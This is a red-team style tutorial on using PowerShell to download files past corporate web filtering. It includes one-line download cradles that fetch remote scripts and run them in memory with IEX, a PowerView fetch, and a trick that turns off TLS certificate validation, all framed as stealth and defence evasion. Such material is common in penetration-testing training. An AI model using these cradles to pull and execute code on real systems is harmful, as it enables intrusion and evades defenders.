# 🌐 PowerShell Web Downloads - ## 🌐 PowerShell Web Downloads β€” Transfer Files Like a Ninja Most companies allow **HTTP/HTTPS** traffic through the firewall βœ…\ This means you can use it to **download files**, but defenders might: * ❌ Block specific file types (like `.exe`) * ❌ Restrict by domain * πŸ” Use Web filtering or allow only whitelisted websites But you, the clever operator, still have **PowerShell**! πŸ§™β€β™‚οΈ *** ## βš™οΈ PowerShell's `System.Net.WebClient` Methods Here’s what you can do with it: | **Method** | **Description** | | ------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------------------------------------------------------------- | | [OpenRead](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openread?view=net-6.0) | Returns the data from a resource as a [Stream](https://docs.microsoft.com/en-us/dotnet/api/system.io.stream?view=net-6.0). | | [OpenReadAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openreadasync?view=net-6.0) | Returns the data from a resource without blocking the calling thread. | | [DownloadData](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=net-6.0) | Downloads data from a resource and returns a Byte array. | | [DownloadDataAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddataasync?view=net-6.0) | Downloads data from a resource and returns a Byte array without blocking the calling thread. | | [DownloadFile](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-6.0) | Downloads data from a resource to a local file. | | [DownloadFileAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfileasync?view=net-6.0) | Downloads data from a resource to a local file without blocking the calling thread. | | [DownloadString](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-6.0) | Downloads a String from a resource and returns a String. | | [DownloadStringAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstringasync?view=net-6.0) | Downloads a String from a resource without blocking the calling thread. | *** ### πŸ’Ύ Download a File with DownloadFile {% code overflow="wrap" %} ```powershell (New-Object Net.WebClient).DownloadFile('https://example.com/file.exe', 'C:\Users\Public\file.exe') ``` {% endcode %} ### πŸ”„ Download a File with DownloadFileAsync: {% code overflow="wrap" %} ```powershell (New-Object Net.WebClient).DownloadFileAsync('https://example.com/file.exe', 'C:\Users\Public\file.exe') ``` {% endcode %} *** ### 🧠 Fileless Execution with `DownloadString` & `IEX` πŸ•΅οΈβ€β™€οΈ No touching disk! 🫣 Just download and execute **in memory**: ```powershell IEX (New-Object Net.WebClient).DownloadString('https://url.com/script.ps1') ``` ### Or via pipeline (same thing): ```powershell (New-Object Net.WebClient).DownloadString('https://url.com/script.ps1') | IEX ``` Great for stealth operations 😎 *** ### 🐒 `Invoke-WebRequest` (aka `iwr`, `curl`, `wget`) ```powershell Invoke-WebRequest 'https://url.com/script.ps1' -OutFile 'PowerView.ps1' ``` 🚫 Slower than WebClient, but very powerful. *** ### 🧰 Common PowerShell Web Errors (and Fixes) #### **❌ Internet Explorer First-Launch Not Complete?** Fix it with: ```powershell Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX ``` #### **❌ SSL/TLS Trust Error? (Invalid Cert) 🧻** Bypass it like this: ```powershell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` Then retry your download. *** ### πŸ“š Pro Tip! πŸ”— Harmj0y has a [treasure chest](https://gist.github.com/HarmJ0y/bb48307ffa663256e239) of **PowerShell download cradles**. Study them! They help: * Avoid disk writes πŸ›‘πŸ–±οΈ * Bypass proxy issues 🧱 * Stay under the radar πŸ‘» ***